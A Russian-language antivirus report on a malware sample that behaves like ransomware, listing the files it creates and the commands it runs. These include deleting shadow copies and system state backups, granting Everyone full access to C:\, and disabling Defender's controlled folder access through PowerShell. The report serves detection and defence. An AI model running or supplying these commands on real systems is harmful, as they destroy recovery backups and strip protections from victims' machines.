Техническая информация
Вредоносные функции
Для затруднения выявления своего присутствия в системе
удаляет теневые копии разделов.
Внедряет код в
следующие системные процессы:
- <SYSTEM32>\wbadmin.exe
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\hnta\container
- %WINDIR%\logs\windowsbackup\wbadmin.0.etl
Перемещает следующие файлы
- %WINDIR%\logs\windowsbackup\wbadmin.0.etl в %WINDIR%\logs\windowsbackup\wbadmin.1.etl
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -EnableControlledFolderAccess Disabled' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Test-Connection google.com' (со скрытым окном)
- '<SYSTEM32>\werfault.exe' -u -p 2132 -s 676' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c vssadmin.exe delete shadows /all /quiet
- '<SYSTEM32>\cmd.exe' /c icacls "C:\*" /grant Everyone:F /T /C /Q
- '<SYSTEM32>\wbadmin.exe' DELETE SYSTEMSTATEBACKUP
- '<SYSTEM32>\icacls.exe' "C:\*" /grant Everyone:F /T /C /Q
- '<SYSTEM32>\wbadmin.exe' DELETE SYSTEMSTATEBACKUP -deleteOldest
- '<SYSTEM32>\wbadmin.exe' DELETE SYSTEMSTATEBACKUP -keepVersions:0
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -EnableControlledFolderAccess Disabled
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Test-Connection google.com
